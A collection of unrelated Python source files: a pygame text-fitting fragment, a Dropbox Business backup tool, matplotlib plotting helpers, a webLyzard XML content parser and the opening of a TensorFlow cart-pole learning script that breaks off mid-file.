lower, upper = 0, font_size
found = False
while not found:
font = pygame.font.SysFont(font_name, font_size)
font_sizes = tuple(font.size(' '.join(row)) for row in text_array) # Font size (width, height) of each row.
text_width = max(size[0] for size in font_sizes)
text_height = font_sizes[0][1] * rows
# The surface cannot fit an exact font size so we'll return the lower of the two.
if upper - lower <= 1:
found = True
# Width exceed but height will fit one extra row.
elif text_width > width and text_height + text_height // rows <= height:
for row, x in enumerate(font_sizes):
if x[0] == text_width:
if len(text_array[row]) > 1:
if row + 1 in appendable_rows:
word = text_array[row].pop()
text_array[row + 1].insert(0, word)
else:
word = text_array[row].pop()
text_array.insert(row + 1, [word])
appendable_rows.append(row + 1)
rows += 1
else:
upper = font_size
font_size = (lower + upper) // 2
break
elif text_width > width or text_height > height:
upper = font_size
font_size = (lower + upper) // 2
elif text_width < width and text_height < height:
lower = font_size
font_size = (lower + upper) // 2
else:
found = True
return_surface = pygame.Surface(size)
return_surface.fill(bg_color)
h = height // rows
for row, text_row in enumerate(text_array):
sub_surface = pygame.font.SysFont(font_name, lower).render(' '.join(text_row), 1, font_color)
rect = self._text_area.copy()
rect.height = h
rect.topleft = (0, h * row)
pos = sub_surface.get_rect()
setattr(pos, self._anchor, getattr(rect, self._anchor))
return_surface.blit(sub_surface, pos)
return lower, return_surface
|
|
"""Backup Dropbox Business files.
See README.md for full instructions.
"""
import argparse
from datetime import date, datetime
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import json
import logging
import logging.config
import os
import re
import string
import sys
import time
from typing import Callable, Generic, Iterator, Set, TypeVar
import queue
import dropbox # type: ignore
__version__ = '2.1.8'
DOWNLOAD_THREADS = 8
MAX_QUEUE_SIZE = 100_000
# Characters that are illegal in Windows paths.
# See https://msdn.microsoft.com/en-us/library/aa365247
ILLEGAL_PATH_CHARS = r'<>:"|?*'
ILLEGAL_PATH_PATTERN = re.compile(f'[{re.escape(ILLEGAL_PATH_CHARS)}]')
# Type for mypy generics
T = TypeVar('T')
class SetQueue(queue.Queue, Generic[T]):
"""Queue which will allow a given object to be put once only.
Objects are considered identical if hash(object) are identical.
"""
def __init__(self, maxsize: int = 0) -> None:
"""Initialise queue with maximum number of items.
0 for infinite queue
"""
super().__init__(maxsize)
self.all_items: Set[T] = set()
def _put(self, item: T) -> None:
# Allow multiple Nones to be queued to act as sentinels
if item not in self.all_items or item is None:
super()._put(item)
self.all_items.add(item)
class File:
"""File on Dropbox.
Class required to make files hashable and track the owning member.
"""
def __init__(self, file: dropbox.files.Metadata,
member: dropbox.team.TeamMemberProfile) -> None:
self.file = file
self.member = member
def __hash__(self) -> int:
"""Make File hashable for use in sets."""
return hash(self.file.id)
def __eq__(self, other: object) -> bool:
"""Must implement __eq__ if we implement __hash__."""
if isinstance(other, File):
return self.file.id == other.file.id
return NotImplemented
def __repr__(self):
return self.file.path_display
def parse_args() -> argparse.Namespace:
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--version', action='version',
version=f'%(prog)s {__version__}')
msg = 'select only files modified since date in YYYY-MM-DD format'
parser.add_argument('--since', help=msg)
msg = 'select only files up to size in MB inclusive'
parser.add_argument('--maxsize', type=int, help=msg)
msg = 'path of output directory. Default is "yyyy-mm-dd backup".'
parser.add_argument('--out', help=msg)
msg = ('Dropbox Business access token. The environment variable '
'DROPBOX_TEAM_TOKEN is used if token is not supplied.')
parser.add_argument('--token', help=msg)
args = parser.parse_args()
# Create an output directory name if one was not given
if not args.out:
args.out = date.today().strftime('%Y-%m-%d') + ' backup'
# If since was specified, append it to the output directory name
if args.since:
args.out = ' '.join((args.out, 'since', args.since))
# Convert since to a datetime object
if args.since:
args.since = datetime.strptime(args.since, '%Y-%m-%d')
if args.since > datetime.now():
msg = '"Since" date must not be later than today.'
parser.error(msg)
if not args.token:
try:
args.token = os.environ['DROPBOX_TEAM_TOKEN']
except KeyError:
parser.error('Dropbox Team token required')
return args
def setup_logging() -> None:
DEFAULT_LOGGING = {
"version": 1,
"formatters": {
"standard": {
"format": "%(asctime)s %(levelname)-8s %(name)s: %(message)s"
},
"brief": {
"format": "%(asctime)s %(levelname)-8s %(message)s",
"datefmt": "%H:%M:%S"
}
},
"handlers": {
"console": {
"formatter": "brief",
"class": "logging.StreamHandler"
},
"file": {
"formatter": "standard",
"class": "logging.handlers.RotatingFileHandler",
"filename": "backup.log",
"maxBytes": 10_000_000,
"backupCount": 20,
"encoding": "utf-8"
}
},
"loggers": {
# Prevent numerous INFO messages from the dropbox package
"dropbox": {
"level": "WARNING"
}
},
"root": {
"level": "INFO",
"handlers": ["console", "file"]
}
}
try:
with open('logging_config.json') as f:
logging.config.dictConfig(json.load(f))
except FileNotFoundError:
logging.config.dictConfig(DEFAULT_LOGGING)
def get_members(team: dropbox.dropbox.DropboxTeam) \
-> Iterator[dropbox.team.TeamMemberProfile]:
"""Generate Dropbox Businesss members."""
members_list = team.team_members_list()
for member in members_list.members:
yield member
while members_list.has_more:
members_list = team.team_members_list_continue(members_list.cursor)
for member in members_list.members:
yield member
def enqueue(member: dropbox.team.TeamMemberProfile, q: queue.Queue,
getter: Callable[[dropbox.team.TeamMemberInfo], Iterator[File]],
predicate: Callable[[dropbox.files.Metadata], bool]) -> None:
"""Enqueue files for member if predicate(file) is True."""
for f in getter(member):
if predicate(f):
q.put(f)
def dequeue(q: queue.Queue, download: Callable[[File], None]) -> None:
"""Call download on each item in queue until q.get() returns None."""
logger = logging.getLogger('backup.dequeue')
while True:
file = q.get()
if file is None:
logger.info(f'Poison pill found with {q.qsize()} left in queue')
break
member_name = file.member.profile.name.display_name
msg = f'{q.qsize()} left in queue. Downloading {file} as {member_name}'
logger.info(msg)
download(file)
def get_files(member: dropbox.team.TeamMemberInfo,
team: dropbox.DropboxTeam) -> Iterator[File]:
"""Generate files for the given member."""
logger = logging.getLogger('backup.get_files')
display_name = member.profile.name.display_name
logger.info(f'Listing files for {display_name}')
user = team.as_user(member.profile.team_member_id)
folder_list = user.files_list_folder('', True)
for entry in folder_list.entries:
logger.debug(f'Found {entry.path_display}')
yield File(entry, member)
while folder_list.has_more:
folder_list = user.files_list_folder_continue(folder_list.cursor)
for entry in folder_list.entries:
logger.debug(f'Found {entry.path_display}')
yield File(entry, member)
logger.info(f'No more files for {display_name}')
def should_download(file: File, args: argparse.Namespace) -> bool:
"""Return the True if file passes the filters specified in args."""
logger = logging.getLogger('backup.should_download')
# Do not download folders
if isinstance(file.file, dropbox.files.FolderMetadata):
return False
try:
# Ignore large files
if args.maxsize is not None and file.file.size > 1e6 * args.maxsize:
logger.debug(f'Too large: {file}')
return False
# Ignore files modified before given date
if args.since is not None and args.since > file.file.server_modified:
logger.debug(f'Too old: {file}')
return False
except AttributeError:
# Not a file. Don't mark to download
logger.error(f'Does not have file attributes: {file}')
return False
# Return all other files
logger.debug(f'OK: {file}')
return True
def remove_unprintable(text: str) -> str:
"""Remove unprintable unicode characters."""
return ''.join(c for c in text if c in string.printable)
def remove_illegal(path: str) -> str:
"""Remove illegal characters."""
return re.sub(ILLEGAL_PATH_PATTERN, '', path)
def download(file: File, team: dropbox.dropbox.DropboxTeam,
root: str) -> None:
"""Save the file under the root directory given."""
logger = logging.getLogger('backup.download')
path = remove_illegal(remove_unprintable(file.file.path_display))
# Remove the leading slash from printable_path
local_path = os.path.join(root, path[1:])
member_name = file.member.profile.name.display_name
logger.debug(f'Saving {local_path} as {member_name}')
# Create output directory if it does not exist
try:
os.makedirs(os.path.dirname(local_path), exist_ok=True)
user = team.as_user(file.member.profile.team_member_id)
user.files_download_to_file(local_path, file.file.path_display)
except FileNotFoundError:
# FileNotFoundError raised if path is too long
# If this occurs, see https://bugs.python.org/issue27731
logger.exception('Path might be too long')
except dropbox.exceptions.ApiError as ex:
if ex.user_message_text:
logger.error('API error message: ' + ex.user_message_text)
else:
fmt = '{} for {} as {}'
logger.error(fmt.format(ex.error, file.file.path_display,
file.member.profile.name.display_name))
except Exception:
msgs = [f'Exception whilst saving {local_path}',
f'Dropbox path is {file.file.path_display}',
f'File ID is {file.file.id}',
f'User is {file.member.profile.name.display_name}',
f'User ID is {file.member.profile.team_member_id}']
logger.exception(os.linesep.join(msgs))
def list_and_save(args: argparse.Namespace) -> None:
"""List and save Dropbox files (main program)."""
logger = logging.getLogger('backup.list_and_save')
logger.info(f'{__file__} version {__version__}')
team = dropbox.DropboxTeam(args.token)
# Sycnhonised Queue of File objects to download
file_queue = SetQueue[File](MAX_QUEUE_SIZE)
# Create partial functions to save invariant arguments
_get_files = partial(get_files, team=team)
_should_download = partial(should_download, args=args)
_downloader = partial(download, team=team, root=args.out)
with ThreadPoolExecutor(DOWNLOAD_THREADS) as consumer_exec:
# Start the threads to download files
for _ in range(DOWNLOAD_THREADS):
consumer_exec.submit(dequeue, file_queue, _downloader)
# Start the threads to get file names
with ThreadPoolExecutor() as producer_exec:
for member in get_members(team):
producer_exec.submit(enqueue, member, file_queue, _get_files,
_should_download)
# Tell the threads we're done
logger.debug('Shutting down the consumer threads')
for _ in range(DOWNLOAD_THREADS):
file_queue.put(None)
def main() -> int:
setup_logging()
logger = logging.getLogger('backup.main')
# Parse command line arguments
args = parse_args()
try:
start = time.time()
list_and_save(args)
logger.info(f'Exit OK at {time.time() - start:.2f} s')
return 0
# Ignore SystemExit exceptions (raised by argparse.parse_args() etc.)
except SystemExit:
logger.info(f'SystemExit raised at {time.time() - start:.2f} s')
return 1
# Report all other exceptions
except Exception:
logger.exception(f'Uncaught exception at {time.time() - start:.2f} s')
return -1
if __name__ == '__main__':
sys.exit(main())
|
|
###############################################################################
# drawtools.py
# Some drawing tools.
###############################################################################
import sys
import numpy as np
import numpy.linalg as linalg
import scipy as sp
import scipy.constants
import scipy.interpolate as spinterpolate
import matplotlib as mplot
import matplotlib.pyplot as plt
import matplotlib.animation as anim
from matplotlib.patches import FancyArrowPatch
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
from matplotlib.backends.backend_pdf import PdfPages
def plot_2d_func(fun, xvals=None, yvals=None, type="contour", **kwargs):
fig = plt.gcf()
if xvals is None:
xvals = np.arange(-5, 5, 0.5)
if yvals is None:
yvals = np.arange(-5, 5, 0.5)
X, Y = np.meshgrid(xvals, yvals)
zs = np.array([fun(np.array([xvals, yvals])) for xvals, yvals in zip(np.ravel(X), np.ravel(Y))])
Z = zs.reshape(X.shape)
if type == "surf":
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(X, Y, Z, **kwargs)
elif type == "contour":
plt.contour(X, Y, Z, **kwargs)
else:
raise NotImplementedError("Don't know about plot type '%s'..." % type)
return fig
def irreg_contour(x, y, z, xi, yi, **kwargs):
zi = spinterpolate.griddata((x, y), z, (xi[None,:], yi[:,None]), method='cubic')
plt.contour(xi, yi, zi, 15)
class Arrow3D(FancyArrowPatch):
def __init__(self, xs, ys, zs, *args, **kwargs):
FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)
self._verts3d = xs, ys, zs
@classmethod
def from_vector(cls, v, *args, **kwargs):
return cls([0, v[0]], [0, v[1]], [0, v[2]], *args, **kwargs)
@classmethod
def from_vectors(cls, vecs, *args, **kwargs):
l = []
for v in vecs:
l.append(cls([0, v[0]], [0, v[1]], [0, v[2]], *args, **kwargs))
return l
def draw(self, renderer):
xs3d, ys3d, zs3d = self._verts3d
xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))
FancyArrowPatch.draw(self, renderer)
def equalise_axes(*figlist):
axis_lims = []
ax = []
for fig in figlist:
ax.append(fig.gca())
axis_lims.append(ax[-1].axis())
axis_lims = np.array(axis_lims).T
new_axis = (np.min(axis_lims[0]),
np.max(axis_lims[1]),
np.min(axis_lims[2]),
np.max(axis_lims[3]))
for a in ax:
a.axis(new_axis)
def figs_to_pdf(path, figlist):
pdf = PdfPages(path)
for f in figlist:
pdf.savefig(f)
pdf.close()
def anim_3dfunc(X0, X1, Y, interval=50):
"""
anim_3dfunc
Creates an animated plot where points are plotted. Each *column* is a
different time instance.
"""
def get_num(V, num):
if V.ndim == 1:
v = V
else:
v = V[:, num]
return v
def update_histu(num, X0, X1, Y, line):
x0 = get_num(X0, num)
x1 = get_num(X1, num)
y = get_num(Y, num)
line[0].set_data(x0, x1)
line[0].set_3d_properties(y)
sys.stdout.write('%i \r' % num)
return line
def clear_histU():
ls[0].set_data([], [])
ls[0].set_3d_properties([])
return ls
# def clear_histU():
# pass
maxnum = 1
for d in (X0, X1, Y):
try:
maxnum = max(maxnum, d.shape[1])
except:
pass
print maxnum
figU = plt.figure()
ax = figU.add_subplot(111, projection='3d')
ax.set_xlim(np.min(X0), np.max(X0))
ax.set_ylim(np.min(X1), np.max(X1))
ax.set_zlim3d(np.min(Y), np.max(Y))
ls = ax.plot(get_num(X0, 0), get_num(X1, 0), get_num(Y, 0), 'x')
histU_anim = anim.FuncAnimation(figU, update_histu, maxnum, fargs=(X0, X1, Y, ls), interval=interval, blit=False, init_func=clear_histU)
plt.show()
return ax
def line_sets_2d(set1, set2):
'''
line_sets_2d
Draw lines between points in two sets (2D).
'''
plt.plot(np.vstack((set1.T[0, :], set2.T[0, :])), np.vstack((set1.T[1, :], set2.T[1, :])))
def line_sets_3d(ax, set1, set2, opt='r'):
'''
line_sets_3d
Draw lines between points in two sets (3D).
'''
# ax.plot3D(np.vstack((set1.T[0, :], set2.T[0, :])),
# np.vstack((set1.T[1, :], set2.T[1, :])),
# np.vstack((set1.T[2, :], set2.T[2, :])), 'x')
for s1, s2 in zip(set1, set2):
plt.plot([s1[0], s2[0]],
[s1[1], s2[1]],
[s1[2], s2[2]], opt)
def auto_axes_robust(ax, datax, datay, prop=0.95, verbose=False):
'''
auto_axes_robust
Automatically adjust the axes of a plot, but be robust to outliers. Make
sure that at most the proportion of the data given by 'prop' is actually
displayed.
'''
if type(datax) is list:
datax = np.array(datax)
if type(datay) is list:
datay = np.array(datay)
def _find_robust_range(data, prop=0.95):
'''
_find_robust_range
Required function by auto_axes_robust.
'''
numpoints = np.prod(data.shape)
threshold = prop * numpoints
r = max([np.abs(np.max(data)), np.abs(np.min(data))])
while(np.sum(np.abs(data) < r) > threshold):
r *= 0.9
return r, np.sum(np.abs(data) < r) / numpoints
if datax is not None:
rx, fx = _find_robust_range(datax, prop)
ax.set_xlim(-rx, rx)
ry, fy = _find_robust_range(datay, prop)
ax.set_ylim(-ry, ry)
if (verbose):
print('At the least %f is displayed.' % (fx * fy))
def GenEllipsoid(A, c=[0,0,0], divs=100):
"""
Calculate the mesh for an ellipse. Points satisfy (x-c)'A(x-c) = 1. In
other words, A is the *precision* matrix when plotting a Gaussian.
Args:
A: 3x3 matrix describing the ellipse.
c: Centre of the ellipse.
Returns:
(x, y, z): Tuple of 2x2 grids containing the x, y and z coordinates for
the points on the mesh.
"""
# find the rotation matrix and radii of the axes
_, s, rotation = linalg.svd(A)
radii = 1.0/np.sqrt(s)
# now carry on with EOL's answer
u = np.linspace(0.0, 2.0 * np.pi, divs)
v = np.linspace(0.0, np.pi, divs)
x = radii[0] * np.outer(np.cos(u), np.sin(v))
y = radii[1] * np.outer(np.sin(u), np.sin(v))
z = radii[2] * np.outer(np.ones_like(u), np.cos(v))
for i in range(len(x)):
for j in range(len(x)):
[x[i,j],y[i,j],z[i,j]] = np.dot([x[i,j],y[i,j],z[i,j]], rotation) + c
return (x, y, z)
def CalcEllipse(A, c=[0,0], scale=1.0):
B = linalg.inv(A)
a = B[0, 0]
b = B[0, 1]
c = B[1, 1]
cb2a = c - b**2.0/a
start = (2 / cb2a)**0.5
y = np.linspace(-start, start, 1000)
x = (2/a-cb2a*y**2.0/a)**0.5 + b/a*y
return x, -y
def DrawCovarianceContour(A, c=[0,0], scale=2.0, ax=None, *args, **kwargs):
"""
Draw an ellipse for a Gaussian with *covariance* matrix A.
Args:
A: 2x2 matrix describing the ellipse.
c: Centre of the ellipse.
"""
if ax is None:
ax = plt.gca()
if "color" not in kwargs:
kwargs["color"] = 'b'
x, y = CalcEllipse(A, c, scale)
ax.plot(x*scale, y*scale, *args, **kwargs)
ax.plot(-x*scale, -y*scale, *args, **kwargs)
def DrawCovarianceEllipse(A, c=[0, 0, 0], ax=None, scale=1.0, **kwargs):
"""
DrawCovarianceEllipse
A is *covariance* matrix.
"""
x, y, z = GenEllipsoid(linalg.inv(A), c)
x *= scale
y *= scale
z *= scale
if ax is None:
fig = plt.gcf()
ax = fig.add_subplot(111, projection='3d')
if 'rstride' not in kwargs:
kwargs['rstride'] = 8
if 'cstride' not in kwargs:
kwargs['cstride'] = 8
if 'alpha' not in kwargs:
kwargs['alpha'] = 0.2
wframe = ax.plot_wireframe(x, y, z, **kwargs)
return ax, wframe
def plot_3d_points(P, ax=None, marker='x'):
if ax is None:
fig = plt.gcf()
ax = fig.add_subplot(111, projection='3d')
ax.plot(P[:, 0], P[:, 1], P[:, 2], marker)
return ax
if __name__ == "__main__":
import numpy.random as rnd
A = rnd.randn(2, 2)
A = A.dot(A.T)
d = rnd.multivariate_normal(np.zeros(2), A, 1000)
fig = plt.figure(1)
plt.clf()
plt.plot(d[:, 0], d[:, 1], 'x')
ax = plt.gca()
DrawCovarianceContour(ax, A)
A = np.array([[1,0,0],[0,8,0],[0,0,1]])
center = [0,0,0]
x, y, z = GenEllipsoid(A, center)
plt.show()
plt.ion()
fig = plt.figure(2)
ax = fig.add_subplot(111, projection='3d')
wframe = ax.plot_wireframe(x, y, z, rstride=4, cstride=4, color='b', alpha=0.2)
ax.axis([-5, 5, -5, 5])
ax.set_zlim3d(-5, 5)
A = np.array([[1., 0., 0.],[0., 1., 0.], [0., 0., 1.]])
for _ in range(50):
if wframe is not None:
ax.collections.remove(wframe)
x, y, z = GenEllipsoid(A, divs=20)
wframe = ax.plot_wireframe(x, y, z)
ax.axis([-2, 2, -2, 2])
ax.set_zlim3d(-2, 2)
plt.draw()
A[1, 1] = A[1,1] * 0.9
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Created on Feb, 27 2013
.. codeauthor: Heinz-Peter Lang <[email protected]>
.. codeauthor: Albert Weichselbraun <[email protected]>
.. codeauthor: Fabian Fischer <[email protected]>
Handles the new (http://www.weblyzard.com/wl/2013#) weblyzard
XML format.
Functions added:
- support for sentence tokens and pos iterators
Remove functions:
- compatibility fixes for namespaces, encodings etc.
- support for the old POS tags mapping.
'''
from __future__ import unicode_literals
from builtins import str
from builtins import object
import json
from weblyzard_api.model.parsers.xml_deprecated import XMLDeprecated
from weblyzard_api.model.parsers.xml_2005 import XML2005
from weblyzard_api.model.parsers.xml_2013 import XML2013
from weblyzard_api.model.parsers import EmptySentenceException
from weblyzard_api.model import Sentence, Annotation
SENTENCE_ATTRIBUTES = ('pos_tags', 'sem_orient', 'significance', 'md5sum',
'pos', 'token', 'dependency')
class XMLContent(object):
SUPPORTED_XML_VERSIONS = {XML2005.VERSION: XML2005,
XML2013.VERSION: XML2013,
XMLDeprecated.VERSION: XMLDeprecated}
API_MAPPINGS = {
1.0: {
'language_id': 'language_id',
'lang': 'language_id',
'xml:lang': 'language_id',
'title': 'title',
'uri': 'uri'
}
}
ATTRIBUTE_MAPPING = {'uri': 'uri',
'content_id': 'id',
'title': 'title',
'sentences': 'sentences',
'body_annotations': 'annotations',
'lang': 'xml:lang',
'language_id': 'xml:lang',
'sentences_map': {'pos': 'pos',
'token': 'token',
'value': 'value',
'md5sum': 'id'},
'annotations_map': {'start': 'start',
'end': 'end',
'key': 'key',
'surfaceForm': 'surfaceForm'
}}
def __init__(self, xml_content, remove_duplicates=True):
self.xml_version = None
self.attributes = {}
self.sentence_objects = []
self.titles = []
self.remove_duplicates = remove_duplicates
self.body_annotations = []
self.title_annotations = []
self.features = {}
self.relations = {}
result = self.parse_xml_content(xml_content, remove_duplicates)
if result:
self.xml_version, self.attributes, self.sentence_objects, \
self.title_annotations, self.body_annotations, self.titles, \
self.features, self.relations = result
pass
@classmethod
def convert(cls, xml_content, target_version):
xml = XMLContent(xml_content)
return xml.get_xml_document(xml_version=target_version)
@classmethod
def parse_xml_content(cls, xml_content, remove_duplicates=True):
xml_version = cls.get_xml_version(xml_content)
if not xml_version or not xml_content:
return None
sentence_objects = []
annotation_objects = []
parser = cls.SUPPORTED_XML_VERSIONS[xml_version]
try:
attributes, sentences, title_annotations, body_annotations, features, \
relations = parser.parse(xml_content, remove_duplicates, raise_on_empty=True)
except EmptySentenceException as e:
raise EmptySentenceException('Empty sentence object: {}'.format(
xml_content
))
titles = []
for sentence in sentences:
try:
sent_obj = Sentence(**sentence)
except:
sent_obj = Sentence(**{k:v for k,v in sentence.items() if k in Sentence.API_MAPPINGS[1.0]})
if sent_obj.is_title:
titles.append(sent_obj)
else:
sentence_objects.append(sent_obj)
if len(titles) == 0 and 'title' in attributes:
# fall back titles from attributes
titles = [Sentence(value=attributes['title'], is_title=True)]
for annotation in body_annotations:
annotation_obj = Annotation(**annotation)
annotation_objects.append(annotation_obj)
return xml_version, attributes, sentence_objects, title_annotations, \
annotation_objects, titles, features, relations
@classmethod
def get_xml_version(cls, xml_content):
if not xml_content:
return None
for version, xml_parser in cls.SUPPORTED_XML_VERSIONS.items():
if xml_parser.is_supported(xml_content):
return version
def get_xml_document(self, header_fields='all',
sentence_attributes=SENTENCE_ATTRIBUTES,
annotations=None,
features=None,
relations=None,
ignore_title=False,
xml_version=XML2013.VERSION):
'''
:param header_fields: the header_fields to include
:param sentence_attributes: sentence attributes to include
:param annotations, optionally
:param features, optionally to overwrite
:param relations, optionally to overwrite
:param xml_version: version of the webLyzard XML format to use (XML2005.VERSION, *XML2013.VERSION*)
:returns: the XML representation of the webLyzard XML object
'''
if not xml_version:
xml_version = self.xml_version
if not hasattr(self, 'features'):
self.features = {}
if features is None:
features = self.features
if not hasattr(self, 'relations'):
self.relations = {}
if relations is None:
relations = self.relations
titles = self.titles
if ignore_title:
titles = []
return self.SUPPORTED_XML_VERSIONS[xml_version].dump_xml(titles=titles,
attributes=self.attributes,
sentences=self.sentences,
annotations=annotations,
features=features,
relations=relations)
def get_plain_text(self, include_title=False):
''' :returns: the plain text of the XML content '''
if not len(self.all_sentences):
return ''
if not include_title:
return '\n'.join([s.value for s in self.all_sentences if not s.is_title])
else:
return '\n'.join([s.value for s in self.all_sentences])
@classmethod
def get_text(cls, text):
''' :returns: the utf-8 encoded text '''
if isinstance(text, str):
text = text.decode('utf-8')
return text
def add_attribute(self, key, value):
if not self.attributes:
self.attributes = {}
self.attributes[key] = value
def update_attributes(self, new_attributes):
'''
Updates the existing attributes with new ones
:param new_attributes: The new attributes to set.
:type new_attributes: dict
'''
# not using dict.update to allow advanced processing
if not new_attributes or not isinstance(new_attributes, dict):
return
for k, v in new_attributes.items():
self.attributes[str(k)] = v
def update_features(self, new_features):
if not new_features or not isinstance(new_features, dict):
return
for k, v in new_features.items():
self.features[str(k)] = v
def update_relations(self, new_relations):
if not new_relations or not isinstance(new_relations, dict):
return
for k, v in new_relations.items():
self.relations[str(k)] = v
def as_dict(self, mapping=None, ignore_non_sentence=False,
ignore_features=False, ignore_relations=False,
add_titles_to_sentences=False):
''' convert the XML content to a dictionary.
:param mapping: an optional mapping by which to restrict/rename \
the returned dictionary
:param ignore_non_sentence: if true, sentences without without POS tags \
are omitted from the result
:param ignore_features: if true, document features do not get serialized
:param ignore_relations: if true, document relations do not get serialized
:param add_titles_to_sentences: if true, titles are treated as sentences
'''
try:
if mapping is None:
mapping = self.ATTRIBUTE_MAPPING
result = self.apply_dict_mapping(self.attributes, mapping)
sentence_attr_name = mapping['sentences'] if 'sentences' in mapping else 'sentences'
if 'sentences_map' in mapping:
result[sentence_attr_name] = []
sent_mapping = mapping['sentences_map']
if add_titles_to_sentences and len(self.titles):
sentences = self.titles + self.sentences
else:
sentences = self.sentences
for sent in sentences:
if ignore_non_sentence and not sent.pos:
continue
sent_attributes = self.apply_dict_mapping(sent.as_dict(),
sent_mapping)
result[sentence_attr_name].append(sent_attributes)
annotation_attr_name = mapping['body_annotations'] \
if 'body_annotations' in mapping else 'body_annotations'
if 'annotations_map' in mapping:
result[annotation_attr_name] = []
annotation_mapping = mapping['annotations_map']
for annotation in self.body_annotations:
annotation_attributes = self.apply_dict_mapping(annotation.as_dict(),
annotation_mapping)
result[annotation_attr_name].append(annotation_attributes)
if not ignore_features and self.features:
result['features'] = self.features
if not ignore_relations and self.relations:
result['relations'] = self.relations
except Exception as e:
result = self.attributes
result.update({'sentences': [sent.as_dict()
for sent in self.sentences]})
return result
@classmethod
def apply_dict_mapping(cls, attributes, mapping=None):
result = attributes
if mapping:
result = {}
for attr, value in attributes.items():
if attr in mapping:
result[mapping[attr]] = value
return result
def to_api_dict(self, version=1.0):
'''
Transforms the XMLContent object to a dict analoguous to the
API JSON definition in the given version.
:param version: The version to conform to.
:type version: float
:returns: A dict.
:rtype: dict
'''
document_dict = self.as_dict()
api_dict = {}
for key in self.API_MAPPINGS[version]:
if key in document_dict:
api_dict[self.API_MAPPINGS[version][key]] = \
document_dict[key]
if self.sentences and len(self.sentences) > 0:
sentences = [s.to_api_dict(version) for s in self.sentences]
api_dict['sentences'] = sentences
if self.titles and len(self.titles) > 0:
for t in self.titles:
api_dict['sentences'] = [t.to_api_dict(
version)] + api_dict.get('sentences', [])
if 'title' not in api_dict:
api_dict['title'] = t.value
# elif api_dict['title'] != t.value:
# raise Exception('Mismatch between sentence marked as title and '+\
# 'title attribute:\n'+\
# '%s != %s' % (t.value, api_dict['title']))
annotations = document_dict.get('annotations', None)
if annotations:
api_dict['annotations'] = annotations
if self.features and len(self.features) > 0:
api_dict['features'] = self.features
if self.relations and len(self.relations) > 0:
api_dict['relations'] = self.relations
return api_dict
def to_json(self, version=1.0):
'''
Serializes the XMLContent object to JSON according to the
specified version.
:param version: The version to conform to.
:type version: float
:returns: A JSON string.
:rtype: str
'''
return json.dumps(self.to_api_dict(version=version))
def _get_attribute(self, attr_name):
''' ::returns: the attribute for the given name '''
return self.attributes.get(attr_name, None)
def get_nilsimsa(self):
return self._get_attribute('nilsimsa')
def get_content_type(self):
return self._get_attribute('content_type')
def get_title(self):
return self._get_attribute('title')
def get_lang(self):
if self._get_attribute('language_id') is not None:
return self._get_attribute('language_id')
return self._get_attribute('lang')
def get_content_id(self):
content_id = self._get_attribute('content_id')
return int(content_id) if content_id else content_id
def get_sentences(self, include_title_sentences=False):
return self.titles * include_title_sentences + \
self.sentence_objects
def get_all_sentences(self):
return self.get_sentences(include_title_sentences=True)
def update_sentences(self, sentences):
'''
updates the values of the existing sentences. if the list of
sentence object is empty, sentence_objects will be set to the new
sentences.
:param sentences: list of Sentence objects
.. warning:: this function will not add new sentences
'''
if not self.sentence_objects:
self.sentence_objects = sentences
else:
sentence_dict = dict((sent.md5sum, sent) for sent in sentences)
for sentence in self.sentence_objects:
if sentence.md5sum in sentence_dict:
new_sentence = sentence_dict[sentence.md5sum]
for attrib in SENTENCE_ATTRIBUTES:
new_value = getattr(new_sentence, attrib)
if new_value:
setattr(sentence, attrib, new_value)
all_sentences = property(get_all_sentences, update_sentences)
sentences = property(get_sentences, update_sentences)
plain_text = property(get_plain_text)
nilsimsa = property(get_nilsimsa)
content_type = property(get_content_type)
title = property(get_title)
lang = property(get_lang)
content_id = property(get_content_id)
|
|
import tensorflow as tf # neural network for function approximation
import gym # environment
import numpy as np # matrix operation and math functions
from gym import wrappers
import gym_morph # customized environment for cart-pole
import matplotlib.pyplot as plt
import time
# Hyperparameters
RANDOM_NUMBER_SEED = 1
# ENVIRONMENT = "CartPole-v0"
# ENVIRONMENT = "CartPole-v1"
ENVIRONMENT1 = "morph-v0"
ENVIRONMENT2 = "morph-l6-v0"
ENVIRONMENT3 = "morph-l8-v0"
ENVIRONMENT4 = "morph-l10-v0"
# ENVIRONMENT5 = "morph-l7-v0"
MAX_EPISODES = 100 # number of episodes before morphing (or after it)
HIDDEN_LAYER = True
HIDDEN_SIZE = 6
DISPLAY_WEIGHTS = False # Help debug weight update
gamma = 0.99 # Discount per step
alpha = 0.01 # Learning rate
RENDER = False # Render the cart-pole system
VIDEO_INTERVAL = 100 # Generate a video at this interval
CONSECUTIVE_TARGET = 50 # Including previous 50 rewards
env = gym.make(ENVIRONMENT1)
env.seed(RANDOM_NUMBER_SEED)
np.random.seed(RANDOM_NUMBER_SEED)
tf.set_random_seed(RANDOM_NUMBER_SEED)
# Input and output sizes
input_size = env.observation_space.shape[0]
# try:
# output_size = env.action_space.shape[0]
# except AttributeError:
# output_size = env.action_space.n
output_size = env.action_space.n
# Tensorflow network setup
x = tf.placeholder(tf.float32, shape=(None, input_size))
y = tf.placeholder(tf.float32, shape=(None, 1))
expected_returns = tf.placeholder(tf.float32, shape=(None, 1))
# Xavier (2010) weights initializer for uniform distribution:
# x = sqrt(6. / (in + out)); [-x, x]
w_init = tf.contrib.layers.xavier_initializer()
if HIDDEN_LAYER:
hidden_W = tf.get_variable("W1", shape=[input_size, HIDDEN_SIZE],
initializer=w_init)
hidden_B = tf.Variable(tf.zeros(HIDDEN_SIZE))
dist_W = tf.get_variable("W2", shape=[HIDDEN_SIZE, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
hidden = tf.nn.elu(tf.matmul(x, hidden_W) + hidden_B)
dist = tf.tanh(tf.matmul(hidden, dist_W) + dist_B)
else:
dist_W = tf.get_variable("W1", shape=[input_size, output_size],
initializer=w_init)
dist_B = tf.Variable(tf.zeros(output_size))
dist = tf.tanh(tf.matmul(x, dist_W) + dist_B)
dist_soft = tf.nn.log_softmax(dist)
dist_in = tf.matmul(dist_soft, tf.Variable([[1.], [0.]]))
